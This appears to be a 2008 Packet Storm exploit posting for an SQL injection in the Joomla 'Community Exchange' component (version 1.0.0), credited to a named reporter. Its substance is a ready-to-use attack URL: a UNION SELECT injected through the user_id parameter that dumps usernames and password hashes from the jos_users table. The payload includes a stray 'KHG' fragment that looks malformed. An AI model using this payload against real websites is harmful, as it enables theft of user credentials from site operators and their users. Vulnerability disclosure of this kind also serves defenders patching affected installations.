Joomla Community Exchange SQL Injection

2008-10-09T00:00:00
ID PACKETSTORM:70713
Type packetstorm
Reporter Valon Kerolli
Modified 2008-10-09T00:00:00

Description

                                        
                                            `#############################################################################  
# #  
# Joomla Component Community Exchange (user_id) SQL Injection Vulnerability #  
# #  
#############################################################################  
  
  
########################################  
  
[~] Vulnerability found by: Valon Kerolli  
[~] Contact: valon[at]itshqip.com  
[~] Site: www.itshqip.com  
  
########################################  
  
[~] ScriptName: "Joomla"  
[~] ModuleName: "Community Exchange"  
[~] Version: "1.0.0"   
[~] Author: "Mubashir Ahmad Waqar"  
[~] Author E-mail: "contact@intellectcs.com"  
[~] Author URL: "www.intellectcs.com"  
  
########################################  
  
[~] Exploit: /index.php?option=com_cx&task=showrating&user_id=[SQL]  
[~] Example: /index.php?option=com_cx&task=showrating&user_id=-3+union+select+1,concat(username,char(58),password)KHG,3+from+jos_users--  
  
`